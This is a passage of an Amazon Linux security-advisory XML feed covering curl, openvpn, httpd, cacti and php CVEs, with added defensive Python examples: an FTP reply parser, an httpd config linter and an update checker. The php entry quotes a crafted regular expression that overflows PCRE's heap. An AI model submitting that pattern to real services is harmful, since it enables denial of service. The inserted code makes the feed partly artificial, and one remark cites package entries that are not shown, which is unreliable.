arch="noarch"><filename>Packages/golang-misc-1.8.4-1.41.amzn1.noarch.rpm</filename></package><package name="golang" version="1.8.4" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.8.4-1.41.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.8.4" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.8.4-1.41.amzn1.i686.rpm</filename></package><package name="golang" version="1.8.4" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.8.4-1.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2017-919</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-919: medium priority package update for curl</title><issued date="2017-11-02 20:18:00" /><updated date="2017-11-03 05:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000254:
libcurl may read outside of a heap allocated buffer when doing FTP. When libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the `PWD` command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses. Due to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path. A malicious server could abuse this fact and effectively prevent libcurl-based clients from working with it: the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault. The simple fact that this issue has remained undiscovered for this long could suggest that malformed PWD responses are rare in benign servers. We are not aware of any exploit of this flaw. This bug was introduced in commit [415d2e7cb7](https://github.com/curl/curl/commit/415d2e7cb7), March 2005. In libcurl version 7.56.0, the parser always NUL-terminates the string and also rejects it if it is not properly terminated with a final double quote.
1495541:
CVE-2017-1000254 curl: FTP PWD response parser out of bounds read
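An added example of the parsing rule described above, written in Python here and not taken from curl's source: it extracts the quoted pathname from a 257 reply, honours the RFC 959 convention that a literal double quote inside the name is sent as two quotes, and, like libcurl 7.56.0, rejects a name with no closing quote instead of using it. Python strings carry their own length, so the missing NUL terminator cannot cause an over-read here; the point is the accept/reject decision a client has to make on this input. The sample replies are constructed.

```python
def parse_pwd_reply(reply):
    """Return the pathname quoted in an FTP 257 reply, or None if the reply is malformed.

    The name is the text between the first double quote and the next double quote
    that is not immediately doubled (RFC 959 sends a literal quote as two quotes).
    As in libcurl 7.56.0 and later, a name that is never closed is rejected rather
    than used, which is the CVE-2017-1000254 input.
    """
    if not reply.startswith("257"):
        return None                      # not a PWD/MKD success reply
    start = reply.find('"')
    if start == -1:
        return None                      # no quoted pathname at all
    name = []
    pending_quote = False                # last char was a quote: closing, or first of a pair?
    for ch in reply[start + 1:]:
        if pending_quote:
            if ch == '"':
                name.append('"')         # doubled quote: literal quote inside the name
                pending_quote = False
                continue
            return "".join(name)         # the previous quote closed the name
        if ch == '"':
            pending_quote = True
        else:
            name.append(ch)
    if pending_quote:
        return "".join(name)             # closing quote was the final character
    return None                          # ran off the end without a closing quote: reject


SAMPLE_REPLIES = (   # constructed server replies, including the unterminated one
    '257 "/home/user" is the current directory',
    '257 "/srv/""quoted"" dir" is the current directory',
    '257 "/home/user',
    '550 Failed to get directory',
)


if __name__ == "__main__":
    for reply in SAMPLE_REPLIES:
        print(repr(reply), ":", parse_pwd_reply(reply))
```

A client that gets None back should treat the connection as unusable rather than guess at a directory, which is exactly the behaviour the 7.56.0 parser adopted.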
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000254" title="" id="CVE-2017-1000254" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="11.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-11.78.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-11.78.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-11.78.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-11.78.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="11.78.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-11.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-920</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-920: medium priority package update for openvpn</title><issued date="2017-11-02 20:19:00" /><updated date="2017-11-03 05:54:00" /><severity>medium</severity><description>Package updates are available for 
Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12166:
A missing bounds check in the key-method 1 key exchange code (read_key) lets a remote peer trigger a buffer overflow when OpenVPN is configured to use key method 1. Key method 1 is deprecated; the 2.4.4 packages listed below carry the fix.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12166" title="" id="CVE-2017-12166" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.4.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.4-1.21.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.4-1.21.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.4-1.21.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.4-1.21.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.4-1.21.amzn1.i686.rpm</filename></package><package name="openvpn-devel" version="2.4.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.4-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-921</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-921: medium priority package update for httpd</title><issued date="2017-11-02 20:21:00" /><updated date="2017-11-03 05:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12171:
A regression was found in the Red Hat Enterprise Linux 6.9 version of httpd, causing comments in the &quot;Allow&quot; and &quot;Deny&quot; configuration lines to be parsed incorrectly. A web administrator could unintentionally allow any client to access a restricted HTTP resource.
1493056:
CVE-2017-12171 httpd: # character matches all IPs
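An added check for the configuration habit this regression turned into an exposure, not code from httpd or from the advisory: a small linter that flags Allow/Deny lines whose host list contains a '#' token, since httpd has no inline comments and takes everything after 'from' as host entries, and that rewrites such a line with the comment moved above it. The configuration excerpt is constructed.

```python
ACCESS_DIRECTIVES = ("allow", "deny")


def find_commented_host_lists(config_text):
    """Return (line number, directive, host tokens) for every Allow/Deny line that carries
    a '#' inside its argument list.

    httpd has no inline comments: everything after 'from' is the host list, so
    'Allow from 10.0.0.0/8 # corporate' yields the host entries '#' and 'corporate'.
    With the regression described above, the '#' entry matched every client address,
    silently turning the line into 'Allow from all'.
    """
    findings = []
    for line_no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                           # blank line or whole-line comment: fine
        parts = line.split()
        if parts[0].lower() not in ACCESS_DIRECTIVES:
            continue
        if [p.lower() for p in parts[1:2]] != ["from"]:
            continue                           # not an 'Allow from' / 'Deny from' form
        hosts = parts[2:]
        if any(h.startswith("#") for h in hosts):
            findings.append((line_no, parts[0], hosts))
    return findings


def strip_trailing_comment(line):
    """Rewrite one flagged line so the comment moves to its own line above it."""
    directive, _sep, comment = line.partition("#")
    indent = line[:len(line) - len(line.lstrip())]
    return "%s# %s\n%s" % (indent, comment.strip(), directive.rstrip())


SAMPLE_CONFIG = """\
# constructed excerpt of an httpd 2.2 access block (the Directory container lines are omitted)
Order deny,allow
Deny from all
Allow from 10.0.0.0/8 # corporate range
# Allow from 192.0.2.0/24
Allow from 203.0.113.5
"""


if __name__ == "__main__":
    for line_no, directive, hosts in find_commented_host_lists(SAMPLE_CONFIG):
        print("line %d: %s from %s" % (line_no, directive, " ".join(hosts)))
```

Run this over httpd.conf and every included file before deploying an httpd update, and keep it in the config linting step afterwards: the '#' token is a mistake with or without the regression, it simply used to fail closed.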
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12171" title="" id="CVE-2017-12171" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-devel" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.34" release="1.16.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.34-1.16.amzn1.noarch.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.34-1.16.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.34" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.34" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.34-1.16.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.34" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd-debuginfo-2.2.34-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-922</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-922: medium priority package update for curl</title><issued date="2017-11-15 19:54:00" /><updated date="2017-11-20 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000257:
A buffer overrun flaw was found in the IMAP handler of libcurl. By tricking an unsuspecting user into connecting to a malicious IMAP server, an attacker could exploit this flaw to potentially cause information disclosure or crash the application.
1503705:
CVE-2017-1000257 curl: IMAP FETCH response out of bounds read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000257" title="" id="CVE-2017-1000257" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-12.79.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-12.79.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-12.79.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-12.79.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="12.79.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-12.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-923</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-923: medium priority package update for cacti</title><issued date="2017-11-15 19:56:00" /><updated date="2017-11-20 21:38:00" /><severity>medium</severity><description>Package updates are available for 
Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15194:
include/global_session.php in Cacti 1.1.25 has XSS related to (1) the URI or (2) the refresh page.
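The advisory text names Cacti 1.1.25 while the fixed package is cacti-1.1.19-2.18.amzn1: the fix is backported, so "am I affected?" is answered by comparing the installed package EVR against the pkglist entry in this file, not against the upstream version in the CVE text. The following is an added example, not Amazon's or yum's own code, that does that over this file's format: it builds a small updateinfo document in code (constructed to mirror the ALAS-2017-922 and ALAS-2017-923 entries on this page), parses it with ElementTree, and compares it against constructed rpm -qa output using a simplified rpmvercmp (the tilde and caret rules are omitted, an assumption that holds for the EVRs on this page). On a real host, replace the constructed input with ET.parse on the cache file and the rpm query shown in the comment.

```python
import re
import xml.etree.ElementTree as ET


def _cmp(a, b):
    """Three-way compare of two ints or two strings."""
    if a == b:
        return 0
    return 1 if max(a, b) == a else -1


def rpmvercmp(a, b):
    """Simplified rpmvercmp: split into digit and letter runs, compare digit runs as
    integers, a digit run beats a letter run, and the longer value wins on a tie.
    The tilde and caret rules of the real algorithm are left out (assumption: unused here)."""
    seg_a = re.findall(r"[0-9]+|[A-Za-z]+", a)
    seg_b = re.findall(r"[0-9]+|[A-Za-z]+", b)
    for x, y in zip(seg_a, seg_b):
        if x.isdigit() and y.isdigit():
            result = _cmp(int(x), int(y))
        elif x.isdigit() or y.isdigit():
            result = 1 if x.isdigit() else -1
        else:
            result = _cmp(x, y)
        if result != 0:
            return result
    return _cmp(len(seg_a), len(seg_b))


def evr_cmp(evr_a, evr_b):
    """Compare (epoch, version, release) tuples the way rpm does: epoch first."""
    (ea, va, ra), (eb, vb, rb) = evr_a, evr_b
    return _cmp(int(ea), int(eb)) or rpmvercmp(va, vb) or rpmvercmp(ra, rb)


def parse_rpm_qa(text):
    r"""Parse the output of:  rpm -qa --qf '%{NAME} %{ARCH} %{EPOCH} %{VERSION} %{RELEASE}\n'"""
    installed = {}
    for line in text.splitlines():
        name, arch, epoch, version, release = line.split()
        installed[(name, arch)] = ("0" if epoch == "(none)" else epoch, version, release)
    return installed


def missing_security_updates(updateinfo_xml, installed):
    """Match installed packages against every type="security" update in updateinfo.xml
    and report those older than the fixed build."""
    findings = []
    for upd in ET.fromstring(updateinfo_xml).iter("update"):
        if upd.get("type") != "security":
            continue
        advisory = upd.findtext("id")
        severity = upd.findtext("severity")
        cves = [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"]
        for pkg in upd.iter("package"):
            key = (pkg.get("name"), pkg.get("arch"))
            if key not in installed:
                continue
            fixed = (pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))
            if evr_cmp(installed[key], fixed) == -1:
                findings.append((advisory, severity, cves, key[0], installed[key], fixed))
    return findings


def build_sample_updateinfo():
    """Constructed in code rather than read from the cache file; mirrors the structure
    of the ALAS-2017-922 and ALAS-2017-923 entries on this page."""
    root = ET.Element("updates")
    entries = (
        ("ALAS-2017-922", "medium", "CVE-2017-1000257",
         (("curl", "7.53.1", "12.79.amzn1", "x86_64"),
          ("libcurl", "7.53.1", "12.79.amzn1", "x86_64"))),
        ("ALAS-2017-923", "medium", "CVE-2017-15194",
         (("cacti", "1.1.19", "2.18.amzn1", "noarch"),)),
    )
    for advisory, severity, cve, packages in entries:
        upd = ET.SubElement(root, "update", status="final", type="security")
        ET.SubElement(upd, "id").text = advisory
        ET.SubElement(upd, "severity").text = severity
        ET.SubElement(ET.SubElement(upd, "references"), "reference", id=cve, type="cve")
        coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
        for name, version, release, arch in packages:
            ET.SubElement(coll, "package", name=name, version=version,
                          release=release, epoch="0", arch=arch)
    return ET.tostring(root)


# Constructed rpm -qa output: curl and cacti are one build behind, libcurl is current.
RPM_QA_OUTPUT = """\
curl x86_64 (none) 7.53.1 11.78.amzn1
libcurl x86_64 (none) 7.53.1 12.79.amzn1
cacti noarch (none) 1.1.19 1.17.amzn1
"""


if __name__ == "__main__":
    for finding in missing_security_updates(build_sample_updateinfo(), parse_rpm_qa(RPM_QA_OUTPUT)):
        print(finding)
```

Epoch is compared first, which is why the java-1.8.0-openjdk and mod_ssl entries on this page carry epoch="1": a scanner that compares only version strings would rank them wrongly against older epoch-0 builds.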
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15194" title="" id="CVE-2017-15194" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="2.18.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-2.18.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-924</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-924: important priority package update for php56 php70 php71</title><issued date="2017-11-15 20:05:00" /><updated date="2017-11-20 21:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1283:
The pcre_compile2 function in pcre_compile.c in PCRE 8.38 mishandles the /((?:F?+(?:^(?(R)a+\\&quot;){99}-))(?J)(?&#039;R&#039;(?&#039;R&#039;&lt;((?&#039;RR&#039;(?&#039;R&#039;\\){97)?J)?J)(?&#039;R&#039;(?&#039;R&#039;\\){99|(:(?|(?&#039;R&#039;)(\\k&#039;R&#039;)|((?&#039;R&#039;)))H&#039;R&#039;R)(H&#039;R))))))/ pattern and related patterns with named subgroups, which allows remote attackers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
1295385:
CVE-2016-1283 pcre: heap buffer overflow in handling of duplicate named groups (8.39/14)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1283" title="" id="CVE-2016-1283" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-ldap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.32" release="1.135.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.32" release="1.135.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-mbstring-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.32-1.135.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.32" release="1.135.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-mbstring-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-pgsql" 
version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-soap" 
